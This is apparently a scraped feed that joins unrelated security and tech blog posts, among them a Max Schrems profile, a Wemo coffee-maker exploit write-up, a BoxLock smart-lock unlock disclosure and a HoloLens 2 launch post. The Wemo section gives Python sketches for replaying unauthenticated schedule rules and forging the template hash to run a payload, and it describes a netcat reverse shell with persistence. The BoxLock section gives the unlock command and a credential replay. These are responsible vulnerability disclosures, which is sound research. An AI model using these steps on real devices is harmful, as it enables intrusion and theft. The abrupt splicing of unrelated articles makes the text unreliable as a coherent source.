Last year, when Senator Warner told Zuckerberg that “the era of the Wild West in social media is coming to an end,” he may not have realized how quickly that would come true. In July 2018, California passed a statewide data privacy law called the California Consumer Privacy Act. Months later, three US Senators proposed their own federal data privacy laws. And just this month, the Government Accountability Office recommended that Congress pass a data privacy law similar to GDPR.
Data privacy is no longer a concept. It is the law.
In the EU, that law has released a torrent of legal complaints. Hours after GDPR came into effect, Noyb lodged a series of complaints against Google, Facebook, Instagram, and WhatsApp.
Goldberg said the group’s legal complaints are one component of meaningful enforcement on behalf of the government. Remember: Google’s massive penalty began with an investigation that the French authorities said started after it received a complaint from Noyb.
Separately, privacy group Privacy International filed complaints against Europe’s data-brokers and advertising technology companies, and Brave, a privacy-focused web browser, filed complaints against Google and other digital advertising companies.
Google and Facebook did not respond to questions about how they are responding to the legal complaints. Facebook also did not respond to questions about its previous legal battles with Schrems.
Electronic Frontier Foundation International Director Danny O’Brien wrote last year that, while we wait for the results of the above legal complaints, GDPR has already motivated other privacy-forward penalties and regulations around the world:
“In Italy, it was competition regulators that fined Facebook ten million euros for misleading its users over its personal data practices. Brazil passed its own GDPR-style law this year; Chile amended its constitution to include data protection rights; and India’s lawmakers introduced a draft of a wide-ranging new legal privacy framework.”
As the world moves forward, one man—the one who started it all—might be conspicuously absent. Last year, Schrems expressed a desire to step back from data privacy law. If anything, he said, it was time for others to take up the mantle.
“I know I’m going to be deeply engaged, especially at the beginning, but in the long run [Noyb] should absolutely not be Max’s personal NGO,” Schrems told The Register in a January 2018 interview. Asked to clarify about his potential future beyond privacy advocacy, Schrems said: “It’s retirement from the first line of defense, let’s put it that way… I don’t want to keep bringing cases for the rest of my life.”
Surprisingly, for all of Schrems’ public-facing and public-empowering work, his interviews and blog posts sometimes portray him as a deeply humble, almost shy individual, with a down-to-earth sense of humor, too. When asked during a 2016 podcast interview if he felt he would be remembered in the same vein as Edward Snowden, Schrems bristled.
“Not at all, actually,” Schrems said. “What I did is a very conservative approach. You go to the courts, you have your case, you bring it and you do your thing. What Edward Snowden did is a whole different ballgame. He pretty much gave up his whole life and has serious possibilities to some point end up in a US prison. The worst thing that happened to me so far was to be on that security list of US flights.”
During the same interview, Schrems also deflected his search result popularity.
“Everyone knows your name now,” the host said. “If you Google ‘Schrems,’ the first thing that comes up is ‘Max Schrems’ and your case.”
“Yeah but it’s also a very specific name, so it’s not like ‘Smith,’” Schrems said, laughing. “I would have a harder time with that name.”
If anything, the popularity came as a surprise to Schrems. Last year, in speaking to Bloomberg, he described Facebook as a “test case” when filing his original 22 complaints.
“I thought I’d write up a few complaints,” Schrems said. “I never thought it would create such a media storm.”
Glancy described Schrems’ initial investigation into Facebook in much the same way. It started not as a vendetta, she said, but as a courtesy.
“He started out with a really charitable view of [Facebook],” Glancy said. “At some level, he was trying to get Facebook to wake up and smell the coffee.”
That’s the Schrems that Glancy knows best, a multi-faceted individual who makes time for others and holds various interests. A man committed to public service, not public spotlight. A man who still calls and emails her with questions about legal strategy and privacy law. A man who drove down the California coast with some friends during spring break. Maybe even a man who is tired of being seen only as a flag-bearer for online privacy. (He describes himself on his Twitter profile as “(Luckily not only) Law, Privacy and Politics.”)
“At some level, he considers himself a consumer lawyer,” Glancy said. “He’s interested in the ways in which to empower the little guy, who is kind of abused by large entities that—it’s not that they’re targeting them, it’s that they just don’t care. [The people’s] rights are not being taken account of.”
With GDPR in place, those rights, and the people they apply to, now have a little more firepower.
The post Max Schrems: lawyer, regulator, international man of privacy appeared first on Malwarebytes Labs.
The keeper of the internet’s ‘phone book’ is urging a speedy adoption of security-enhancing DNS specifications
The post Escalating DNS attacks have domain name steward worried appeared first on WeLiveSecurity
In their own words:
We are proud to introduce our newest malware analyzer, which now supports the Android platform - Dr.Web vxCube 1.2. It maintains the same fast and versatile functionality when working with Android files. Dr.Web vxCube 1.2 conducts a thorough analysis of APK files and provides in-depth reports on their behavior in the sandbox environment, including information about SMS messages and calls they could try to make. Moreover, each report includes manifest information with a full list of the app’s permissions, activities, broadcast receivers, and services. To view the details generated by Dr.Web vxCube, make sure to click on the behavior tab:
To demonstrate some of the features, let’s take a look at a few malware samples:
Detection summary
At the top of the detailed report we can clearly see a detection summary for this APK file. Note that it displays a verdict based on execution behavior; this verdict may complement Doctor Web's antivirus engine running in VirusTotal.
Malicious functions
We can see the app is sending SMS spam with malicious URLs:
Network activity
The network activity map visually shows where the traffic goes, along with protocol and address information.
Connect the dots
With VT Graph you can see all the relationships above in a single nodes-and-arcs graph enriched with the historical knowledge of the VirusTotal dataset. Forget about having dozens of open tabs to investigate a single incident; one canvas is all you need.
Moreover, as you can see above, you can easily generate an embeddable graph object in order to display your investigation in sites other than VT Graph.
Digging deeper
VT Enterprise users can try some more advanced searches using search modifiers in order to identify interesting samples based on behavioral observations and other structural and in-the-wild metadata.
For example you can search for filenames within the behavior data:
Similarly, the behavior-scoped modifiers can be combined with any other facets in order to pinpoint not only malware families but also their command-and-control servers, drop zones, additional infrastructure, etc.
type:apk androguard:"android.permission.READ_PHONE_STATE" behavior_network:http positives:10+
More insights and giving back to Doctor Web and the community
If you are as grateful as we are for these new insights into Android apps, you can give back to Doctor Web and the community by helping them receive more APKs so that they can continue to improve their defenses. The easiest way to do this is through a community-developed VirusTotal app that will make the task of uploading new APKs to VirusTotal a no-brainer:
We look forward to continuing our close work with Doctor Web; meanwhile, we encourage other sandbox setups to join the multisandbox project.
Facebook has told developers that it prohibits partners from sharing any sensitive user information
IoT devices are notoriously insecure, and this claim can be backed up with a laundry list of examples. With more devices “needing” to connect to the internet, the possibility of your WiFi-enabled toaster getting hacked and tweeting out your credit card number is, amazingly, no longer a joke.
With that in mind, I began to investigate the Mr. Coffee Coffee Maker with Wemo (WeMo_WW_2.00.11058.PVT-OWRT-Smart) since we had previously bought one for our research lab (and we don’t have many coffee drinkers, so I didn’t feel bad about demolishing it!). My hope was to build on previous work done by my colleague Douglas McKee (@fulmetalpackets) and his Wemo Insight smart plug exploit. Finding a similar attack vector absent in this product, I explored a unique avenue and was able to find another vulnerability. In this post I will explore my methodology and processes in detail.
All Wemo devices have two ways of communicating with the Wemo App, remotely via the internet or locally directly to the Wemo App. Remote connectivity is only present when the remote access setting is enabled, which it is by default. To allow the Wemo device to be controlled remotely, the Wemo checks Belkin’s servers periodically for updates. This way the Wemo doesn’t need to open any ports on your network. However, if you are trying to control your Wemo devices locally, or the remote access setting is disabled, the Wemo app connects directly to the Wemo. All my research is based on local device communication with the remote access setting turned off.
To gain insight on how the coffee maker communicates with its mobile application, I first set up a local network capture on my cellphone using an application called “SSL Capture.” SSL Capture allows the user to capture traffic from mobile applications. In this case, I selected the Wemo application. With the capture running, I went through the Wemo app and initiated several standard commands to generate network traffic. By doing this, I was able to view the communication between the coffee maker and the Wemo application. One of the unique characteristics about the app is that the user is able schedule the coffee maker to brew at a specified time. I made a few schedules and saved them.
I began analyzing the network traffic between the phone application and the Mr. Coffee machine. All transmissions between the two devices were issued in plaintext, meaning no encryption was used. I also noticed that the coffee maker and the mobile app were communicating over a protocol called UPNP (Universal Plug and Play), which has preset actions called “SOAP ACTIONS.” Digging deeper into the network capture from the device, I saw the SOAP action “SetRules.” This included XML content that pertained to the “brew schedule” I had set from the mobile application.
A Mr. Coffee “brew” being scheduled.
At this point I was able to see how the Wemo mobile application handled brewing schedules. Next, I wanted to see if the coffee maker performed any sort of validation of these schedules so I went back into the mobile application and disabled them all. I then copied the data and headers from the network capture and used the Linux Curl command to send the packet back to the coffee maker. I got the return header status of “200” which means “OK” in HTTP. This indicated there was no validation of the source of brewing schedules; I further verified with the mobile application and the newly scheduled brew appeared.
Curl command to send a “Brew” schedule to the Wemo Coffee maker.
Screenshot of the Curl command populating the Wemo app with a brew schedule
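A minimal sketch of that replay step: wrap the captured "brew schedule" rule in a UPnP SOAP envelope and POST it straight to the device. The device IP, control path, port, and SOAPACTION value here are assumptions about the Wemo rules service (the real values come from the network capture), and the rule XML stands in for the captured schedule:

```python
# Hypothetical reconstruction of the SetRules replay. All device-specific
# values (IP, port, control path, SOAP action URN) are assumptions; in the
# actual attack they were copied verbatim from the SSL Capture session.
import urllib.request

DEVICE = "http://192.168.1.50:49153"  # hypothetical coffee maker address
SOAP_ACTION = '"urn:Belkin:service:rules:1#SetRules"'  # assumed action URN

def build_set_rules(rule_xml: str) -> urllib.request.Request:
    """Wrap captured rule XML in a SOAP envelope addressed to the device."""
    envelope = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        "<s:Body>" + rule_xml + "</s:Body></s:Envelope>"
    )
    return urllib.request.Request(
        DEVICE + "/upnp/control/rules1",  # assumed control path
        data=envelope.encode(),
        headers={"Content-Type": 'text/xml; charset="utf-8"',
                 "SOAPACTION": SOAP_ACTION},
        method="POST",
    )

req = build_set_rules("<u:SetRules>...captured schedule XML...</u:SetRules>")
# An HTTP 200 response would confirm the device accepted the unauthenticated rule.
```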
At this point I could change the coffee maker’s brew schedule without ever using the Wemo mobile application. To understand how the schedules were stored on the Wemo coffee maker, I decided to physically disassemble it and look at the electronics inside. Once disassembled, I saw there was a Wemo module connected to a larger PCB responsible for controlling the functions of the coffee maker. I then extracted the Wemo module from the coffee maker. It looked almost identical to the Wemo module in the Wemo Insight device. I leveraged Doug’s blog on exploitation of the Wemo Insight to replicate the serial identification, firmware extraction, and root password change. After I obtained root access via the serial port on the Wemo device, I began to investigate how the Wemo application is initiated from the underlying Linux operating system. While looking through some of the most common Linux files and directories, I noticed something odd in the “crontab” file (used in Linux to execute and schedule commands).
It appeared the developers decided to take the easy route and used the Linux crontab file to schedule tasks instead of writing their own brew scheduling function. The crontab entry was the same as the scheduled brew I sent via the Wemo application (coffee-3) and executed as root. This was especially interesting; if I could add some sort of command to execute from the replayed UPNP packet, I could potentially execute my command as root over the network.
With the firmware dumped, I decided to look at the “rtng_run_rule” executable that was called in the crontab. The rtng_run_rule is a Lua script. As Lua is a scripting language, it was written in plaintext and not compiled like all the other Wemo executables. I followed the flow of execution until I noticed the rule passing parameters to a template for execution. At this point, I knew it would be useless trying to inject commands directly into the rule and instead looked at modifying the template performing the execution.
I went back to the Wemo mobile application network captures and started to dig around again. I found the application also sends the templates to the Wemo coffee maker. If I could figure out how to modify the template and still have the Wemo think it is valid, I could get arbitrary code execution.
Template with the correct syntax to pass Wemo’s verification
There were three templates sent over: “do,” “do_if,” and “do_unless.” Each of the templates was a Lua script encoded with base64. Based on this, I knew it would be trivial to insert my own code; the only remaining challenge would be the MD5 hash included at the top of the template. As it turned out, that was hardly an obstacle.
I created an MD5 hash of the base64-decoded Lua script and of the base64-encoded script separately, simply to see if either matched the hash that was being sent; however, neither matched the MD5 in the template. I began to think the developers had used some sort of HMAC or another clever way to hash the template, which would have made it much harder to upload a malicious template. Instead, I was astounded to find that the hashed input was simply the base64 code prepended with the string “begin-base64 644 <template name>” and appended with the string “====.”
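The scheme can be sketched as follows; the template name and Lua body are made up for illustration, and the exact newline placement in the uuencode-style framing is an assumption:

```python
# Sketch of the template hash as described: MD5 not of the Lua source or the
# bare base64, but of the base64 wrapped in "begin-base64 644 <name>" framing.
# Exact whitespace in the framing is assumed; name and payload are made up.
import base64
import hashlib

def template_md5(name: str, lua_source: bytes) -> str:
    """Compute the hash the device expects at the top of a rule template."""
    b64 = base64.b64encode(lua_source).decode()
    framed = f"begin-base64 644 {name}\n{b64}\n====\n"
    return hashlib.md5(framed.encode()).hexdigest()

digest = template_md5("hack", b'os.execute("/tmp/payload.sh")')
```

With this, any attacker-supplied template passes the device's hash check, since everything needed to compute a valid MD5 travels with the template itself.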
At last I had the ability to upload any template of my choice and have it pass all the Wemo’s verification steps necessary to be used by a scheduled rule.
I appended a new template called “hack” and added a block of code within the template to download and execute a shell script.
Within that shell script, I instructed the Mr. Coffee Coffee Maker with Wemo to download a cross-compiled version of Netcat so I could get a reverse shell, and also added an entry to “rc.local.” This was done so that if the coffee maker was power cycled, I would have persistent access to the device after reboot, via the Netcat reverse shell.
The final aspect of this exploit was to use what I learned earlier to schedule a brew with my new “hack” template executing my shell script. I took the schedule I was able to replay earlier and modified it to have the “hack” template execute 5 minutes from the time of sending. I did have to convert the time value required into the epoch time format.
Converting time to Epoch time.
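The conversion itself is a one-liner in most languages; here is a Python sketch of computing “five minutes from now” as epoch seconds, matching the delay described above:

```python
from datetime import datetime, timedelta, timezone

# Schedule the rule to fire five minutes from now, expressed as
# seconds since the Unix epoch (the format the schedule expects).
fire_at = datetime.now(timezone.utc) + timedelta(minutes=5)
epoch_seconds = int(fire_at.timestamp())
```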
Now, I sat back and waited as the coffee maker (at my specified time delay) connected to my computer, downloaded my shell script, and ran it. I verified that I had a reverse shell and that it ran as intended, perfectly.
This vulnerability does require network access to the same network the coffee maker is on. Depending on the complexity of the user’s password, WiFi cracking can be a relatively simple task to accomplish with today’s computing power. For example, we demonstrate a quick and easy brute force dictionary attack to crack a semi-complex WPA2 password (10 characters alpha-numeric) in the demo for the Wemo Insight smart plug. However, even a slightly more complex password, employing special characters, would exponentially increase the difficulty of a brute force attack. We contacted Belkin (who owns Wemo) on November 16th, 2018 and disclosed this issue to them. While the vendor did not respond to this report, we were pleasantly surprised to see that the latest firmware update has patched the issue. Despite a general lack of communication, we’re delighted to see the results of our research further securing home automation devices.
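To put rough numbers on that “exponentially” claim: each additional symbol class multiplies the work for every character position, so even a modest expansion of the alphabet balloons the keyspace. A back-of-the-envelope sketch (symbol counts are approximate):

```python
# 10-character password from letters and digits: 26 + 26 + 10 = 62 symbols.
alnum_keyspace = 62 ** 10

# Adding roughly 32 printable special characters gives ~94 symbols.
full_keyspace = 94 ** 10

# The same length with special characters is over 60x more work to
# brute force, and the gap widens with every extra character.
ratio = full_keyspace // alnum_keyspace
```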
This vulnerability shows that not all exploits are overly complicated or require an exceptional amount of effort to pull off, if you know what to look for. This vulnerability exists solely because a few poor coding decisions were made in conjunction with a lack of input sanitization and validation. Even though this target does not contain sensitive data and is limited to your local network, that doesn’t mean malicious hackers are not targeting IoT devices like this. These devices may serve as a sought-after target as they are often overlooked from a security standpoint and can provide a simple and unmonitored foothold into your home or business network. It is very important for any consumer, when purchasing new IoT gadgets, to ask themselves: “Does this really need to be connected to the internet?” In the case of a coffee maker, I’ll let you be the judge.
2018 was another record-setting year in the continuing trend for consumer online shopping. With an increase in technology and efficiency, and a decrease in cost and shipping time, consumers have clearly made a statement that shopping online is their preferred method.
Chart depicting growth of online, web-influenced and offline sales by year.1
In direct correlation to the growth of online shopping preferences is the increase in home delivery, and correspondingly, package theft. Though my initial instinct was to attempt to recreate YouTuber Mark Rober’s glitter bomb, I practiced restraint and instead settled on investigating an innovative product called the BoxLock (BoxLock firmware 94.50 or below). The BoxLock is a smart padlock that you can set up outside your house to secure a package delivery container. It can be opened either via the mobile application (Android or iPhone) or by using the built-in barcode scanner to scan a package that is out for delivery. The intent is that delivery drivers will use the BoxLock to unlock a secure drop box and place your package safely out of reach of package thieves. The homeowner can then unlock the lock from their phone using the app to retrieve their valuable deliveries.
Since I am more of a hardware researcher, the first thing I did when I got the BoxLock was take it apart to view the internals.
With the device disassembled and the main PCB extracted, I began to look for interesting pins, mainly UART and JTAG connections. I found 5 pins below the WiFi module that I thought could be UART, but after running it through a logic analyzer I didn’t see anything that looked like communication.
The BoxLock uses a SOC (System-on-a-Chip) which contains the CPU, RAM, ROM, and flash memory all in one. However, there was still an additional flash chip which I thought was odd. I used my Exodus Intelligence hardware interface board to connect to the SPI flash chip and dump the contents.
Exodus Intelligence XI Hardware Interface Board
The flash chip was completely empty. My working theory is that this flash chip is used to store the barcodes of packages out for delivery. There could also have been an issue with my version of Flashrom, the software I used to dump the flash. The only reason I question my version of Flashrom is that I had to compile it myself with support for the exact flash chip (FT25H04S), since it is not supported by default.
The Main SOC (ATSAMD21J18)
Even though I couldn’t get anything from that flash chip, my main target here was the SOC. On the underside of the printed circuit board (PCB), I identified two Tag-Connect ports. I identified the SWD (Serial Wire Debug) pins located on the SOC (pins 57 and 58 on the image above) and very slowly and carefully visually traced the paths to the smaller Tag-Connect connection.
Adafruit Feather M0 Development board
Since I had not done much JTAG analysis before, I grabbed an Adafruit Feather M0 that we had in our lab for testing; the Feather uses the exact same SOC and WiFi chip as the BoxLock. The Adafruit Feather has excellent documentation on how to connect to the SOC via the SWD pins I had traced. I used Atmel Studio to read the info off the ATSAMD21 SOC; this showed me how to read the fuses as well as dump the entire flash off the Adafruit Feather.
SWD information of the Adafruit Feather M0
Atmel Studio also will let you know if the device has the “Security Bit” enabled. When set, the security bit is used to disable all external programming and debugging interfaces, making memory extraction and analysis extremely difficult. Once the security bit is set, the only way to bypass or clear the bit is to completely erase the chip.
Showing how to set the security bit on the Adafruit Feather M0
After I felt comfortable with the Adafruit Feather, I connected the BoxLock to a Segger JLink and loaded up Atmel Studio. The Segger JLink is a debugging device that can be used for JTAG and SWD. I was surprised to find that the developers had set the security bit; this feature is often overlooked in IoT devices. However, with the goal of finding vulnerabilities, this was a roadblock. I started to look elsewhere.
Segger JLink used for SWD communication
After spending some time under the microscope, I was able to trace the larger Tag-Connect port back to the BLE (Bluetooth Low Energy) module. The BLE module contains a full SOC of its own, which could be interesting to look at, but before investigating the BLE chip I still had two other vectors to examine: BLE and WiFi network traffic.
BLE is different from classic Bluetooth. Communication between BLE devices is secured with encryption whose robustness depends on the pairing mode used, and BLE allows a few different pairing modes; the BoxLock uses the least secure of these, “Just Works.” This mode allows any device to connect without the PIN pairing that normal Bluetooth connections are known for, which means BLE devices can be passively intercepted and are susceptible to MITM (man-in-the-middle) attacks.
BLE roles are defined at the connection layer. GAP (Generic Access Profile) describes how devices identify and connect to each other. The two most important roles are the Central and Peripheral roles. Low-power devices like the BoxLock follow the Peripheral role and broadcast their presence (advertisement). More powerful devices, such as your phone, scan for advertising devices and connect to them (the Central role). Communication between the two roles is done via special commands, usually targeted at GATT (Generic Attribute) services. GATT services can be standard and generic, such as 0x180F, the identifier for the Battery Service. Standardized GATT services help devices communicate with one another without the need for custom protocols. The GATT services present on the BoxLock were all custom, which means they are displayed as “Unknown Service” when enumerated in a Bluetooth/BLE app. I chose Nordic’s NRF Connect, available in both the Apple and Android app stores as well as a desktop application.
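Incidentally, short identifiers like 0x180F are shorthand for full 128-bit UUIDs built on the Bluetooth SIG base UUID; custom services like the BoxLock’s use their own random 128-bit values instead, which is why a generic app can only show them as “Unknown Service.” The expansion looks like this:

```python
def expand_16bit_uuid(short: int) -> str:
    """Expand a 16-bit SIG-assigned identifier into its full
    128-bit form using the Bluetooth base UUID."""
    return f"0000{short:04x}-0000-1000-8000-00805f9b34fb"

battery_service = expand_16bit_uuid(0x180F)
# -> "0000180f-0000-1000-8000-00805f9b34fb"
```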
NRF Connect application connected to the BoxLock via BLE
Next, I began searching for UUIDs and the keyword “GATT”. I was able to find the entire list of GATT services and what they pertain to.
GATT services UUID descriptions
The one I was most interested in was labeled “Command Service”; this is where the unlock command is sent. To try it out, I used the NRF Connect application to send a GATT “sendOpenSignal” command with an attribute value of “2”.
How the Android application sends the unlock command
It was just that simple; lo and behold, the BoxLock unlocked!
I was amazed; the phone that I used to send the GATT command over had never connected to the BoxLock before and did not have the BoxLock application installed, yet it was able to unlock the BoxLock. (The vulnerable application version is v1.25 and below).
Continuing to explore the other GATT UUIDs, I was able to read the WiFi SSID, access token, user’s email, and client ID directly off the device. I was also able to write any of these same values arbitrarily.
Information that you can see about the BoxLock via the NRF Connect application
The mandatory identifiers required for the BoxLock to unlock are the access token, user email, and client ID. If those values are not present the device will not authenticate via the cloud API and will not unlock.
The most glaring issue with having all these fields readable and writeable is that I was able to successfully replay them on the device, ultimately bypassing any authentication which led to the BoxLock unlocking.
From my testing, these values never expired and the only way I found that the device cleared the credentials necessary to authenticate was when I removed the battery from the BoxLock. The BoxLock battery is “technically” never supposed to be removed, but since I physically disassembled the lock, (which took a decent amount of effort), I was able to test this.
Even though I was able to unlock the BoxLock, I still wanted to explore one other common attack vector. I analyzed the network traffic between the device and the internet. I quickly noticed that, apart from firmware updates, device-to-cloud traffic was properly secured with HTTPS and I could not easily get useful information from this vector.
I do not currently have an estimate of the extent of this product’s deployment, so I cannot comment on how wide the potential impact could have been if this issue had been found by a malicious party. One constraint on the attack vector is that it requires BLE, which communicates from a distance of approximately 30 or 40 feet. However, for someone looking to steal packages this would not be a difficult challenge to overcome, as the unlocking attack could be completed very quickly and easily, making the bar for exploitation simply a smartphone with Bluetooth capability. The ease and speed of the exploit could have made for an enticing target for criminals.
I want to take a moment to give some very positive feedback on this vendor. Vulnerability disclosure can be a challenging issue for any company to deal with, but BoxLock was incredibly responsive, easy to work with and immediately recognized the value that McAfee ATR had provided. Our goal is to eliminate vulnerabilities before malicious actors find them, as well as illuminate security issues to the industry so we can raise the overall standard for security. BoxLock was an excellent example of this process at work; the day after disclosing the vulnerability, they set up a meeting with us to discuss our findings, where we proposed a mitigation plan. The BoxLock team set a plan in place to patch not only the BoxLock firmware but the mobile applications as well. Within a week, the vendor created a patch for the vulnerability and updated the mobile apps to force a mandatory update to the patched firmware version. We tested the firmware and app update and verified that the application properly clears credentials after use on the vulnerable firmware. We also tested the new firmware, which clears the credentials even without the mobile app’s interaction.
IoT security has increasingly become a deciding factor for consumers. The process of vulnerability disclosure is an effective method to increase collaboration between vendors, manufacturers, the security community and the consumer. It is our hope that vendors move towards prioritizing security early in the product development lifecycle. We’d like to thank BoxLock for an effective end-to-end communication process, and we’re pleased to report that this significant flaw has been quickly eradicated. We welcome any questions or comments on this blog!
We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.
Mobile Connectivity and the Evolving Threat Landscape
These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.
Growing Partnerships to Protect What Matters
Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.
We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.
We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.
The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.
GoBuster is a Go-based tool used to brute-force URIs (directories and files) in web sites and DNS subdomains (with wildcard support) – essentially a directory/file & DNS busting tool.
The author built YET ANOTHER directory and DNS brute forcing tool because he wanted…
- … something that didn’t have a fat Java GUI (console FTW).
- … to build something that just worked on the command line.
- … something that did not do recursive brute force.
Visit us at Booth #4435 and let us know how our experts can help you ensure your security program goes beyond one-size-fits-all solutions.
This evening at a press event to kick off MWC Barcelona, I had the pleasure of joining CEO Satya Nadella and Technical Fellow Alex Kipman onstage to talk in depth about Microsoft’s worldview for the intelligent cloud and intelligent edge.
As part of today’s press event, we also introduced the world to HoloLens 2.
This is a tremendously exciting time for Microsoft, our partners, our customers, the computing industry and indeed the world. The virtually limitless computing power and capability of the cloud combined with increasingly intelligent and perceptive edge devices embedded throughout the physical world create experiences we could only imagine a few short years ago.
When intelligent cloud and intelligent edge experiences are infused with mixed reality, we have a framework for achieving amazing things and empowering even more people.
Today represents an important milestone for Microsoft. This moment captures the very best efforts and passion of numerous teams spanning Azure, HoloLens, Dynamics 365 and Microsoft Devices — this truly is a moment where the sum is greater than the parts. From cutting-edge hardware design to mixed reality-infused cloud services, today’s announcements represent the collective work of many teams. And none of this would be possible without our passionate community of customers, partners and developers.
On behalf of everyone on the team, it is my privilege to introduce you to HoloLens 2 and all the announcements we made today to kick off MWC Barcelona.
Introducing HoloLens 2
Since the release of HoloLens in 2016 we have seen mixed reality transform the way work gets done. We have unlocked super-powers for hundreds of thousands of people who go to work every day. From construction sites to factory floors, from operating rooms to classrooms, HoloLens is changing how we work, learn, communicate and get things done.
We are entering a new era of computing, one in which the digital world goes beyond two-dimensional screens and enters the three-dimensional world. This new collaborative computing era will empower us all to achieve more, break boundaries and work together with greater ease and immediacy in 3D.
Today, we are proud to introduce the world to Microsoft HoloLens 2.
Our customers asked us to focus on three key areas to make HoloLens even better. They wanted HoloLens 2 to be even more immersive and more comfortable, and to accelerate the time-to-value.
Immersion is greatly enhanced by advancements across the board, including in the visual display system, making holograms even more vibrant and realistic. We have more than doubled the field of view in HoloLens 2, while maintaining the industry-leading holographic density of 47 pixels per degree of sight. HoloLens 2 contains a new display system that enables us to achieve these significant advances in performance at low power. We have also completely refreshed the way you interact with holograms in HoloLens 2. Taking advantage of our new time-of-flight depth sensor, combined with built-in AI and semantic understanding, HoloLens 2 enables direct manipulation of holograms with the same instinctual interactions you’d use with physical objects in the real world. In addition to the improvements in the display engine and direct manipulation of holograms, HoloLens 2 contains eye-tracking sensors that make interacting with holograms even more natural. You can log in with Windows Hello enterprise-grade authentication through iris recognition, making it easy for multiple people to quickly and securely share the device.
Comfort is enhanced by a more balanced center of gravity, the use of light carbon-fiber material and a new mechanism for donning the device without readjusting. We’ve improved the thermal management with new vapor chamber technology and accounted for the wide physiological variability in the size and shape of human heads by designing HoloLens 2 to comfortably adjust and fit almost anyone. The new dial-in fit system makes it comfortable to wear for hours on end, and you can keep your glasses on because HoloLens 2 adapts to you by sliding right over them. When it’s time to step out of mixed reality, flip the visor up and switch tasks in seconds. Together, these enhancements have more than tripled the measured comfort and ergonomics of the device.
Time-to-value is accelerated by Microsoft mixed reality applications like Dynamics 365 Remote Assist, Dynamics 365 Layout and the new Dynamics 365 Guides applications. In addition to the in-box value, our ecosystem of mixed reality partners provides a broad range of offerings built on HoloLens that deliver value across a range of industries and use cases. This partner ecosystem is being supplemented by a new wave of mixed reality entrepreneurs who are realizing the potential of devices like HoloLens 2 and the Azure services that give them the spatial, speech and vision intelligence needed for mixed reality, plus battle-tested cloud services for storage, security and application insights.
Building on the unique capabilities of the original HoloLens, HoloLens 2 is the ultimate intelligent edge device. And when coupled with existing and new Azure services, HoloLens 2 becomes even more capable, right out of the box.
HoloLens 2 will be available this year at a price of $3,500. Bundles including Dynamics 365 Remote Assist start at $125/month. HoloLens 2 will be initially available in the United States, Japan, China, Germany, Canada, United Kingdom, Ireland, France, Australia and New Zealand. Customers can preorder HoloLens 2 starting today at https://www.microsoft.com/en-us/hololens/buy.
In addition to HoloLens 2, we were also excited to make the following announcements at MWC Barcelona.
Azure Kinect Developer Kit (DK)
The Azure Kinect DK is a developer kit that combines our industry-leading AI sensors in a single device. At its core are the time-of-flight depth sensor we developed for HoloLens 2, a high-def RGB camera and a 7-microphone circular array that will enable development of advanced computer vision and speech solutions with Azure. It enables solutions that don’t just sense but understand the world — people, places, things around it. A good example of such a solution in the healthcare space is Ocuvera, which is using this technology to prevent patients from falling in hospitals. Every year in the U.S. alone, over 1 million hospital patients fall, and 11,000 of those falls are fatal. With Azure Kinect, the environmental precursors to a fall can be determined and a nurse notified to get to patients before they fall. Initially available in the U.S. and China, the Azure Kinect DK is available for preorder today at $399. Visit Azure.com/Kinect for more info.
Dynamics 365 Guides
When we announced Dynamics 365 Remote Assist and Dynamics 365 Layout on October 1, we talked about them as the “first” of our mixed reality applications for HoloLens.
Today, we are proud to announce our latest offering: Microsoft Dynamics 365 Guides.
Dynamics 365 Guides is a new mixed reality app that empowers employees to learn by doing. Guides enhances learning with step-by-step instructions that guide employees to the tools and parts they need and how to use them in real work situations. In addition to the experience of using Guides on HoloLens, a Guides PC app makes it easy to create interactive content, attach photos and videos, import 3D models and customize training to turn institutional knowledge into a repeatable learning tool.
This application will help minimize downtime and increase efficiency for mission-critical equipment and processes, and it becomes the third Dynamics 365 application that will work on both the previous generation of HoloLens and the new HoloLens 2.
Dynamics 365 Guides is available in preview starting today.
Azure Mixed Reality Services
Today we also announced two new Azure mixed reality services. These services are designed to help every developer and every business build cross-platform, contextual and enterprise-grade mixed reality applications.
Azure Spatial Anchors enables businesses and developers to create mixed reality apps that map, designate and recall precise points of interest that are accessible across HoloLens, iOS and Android devices. These precise points of interest enable a range of scenarios, from shared mixed reality experiences to wayfinding across connected places. We’re already seeing this service help our customers work and learn with greater speed and ease in manufacturing, architecture, medical education and more.
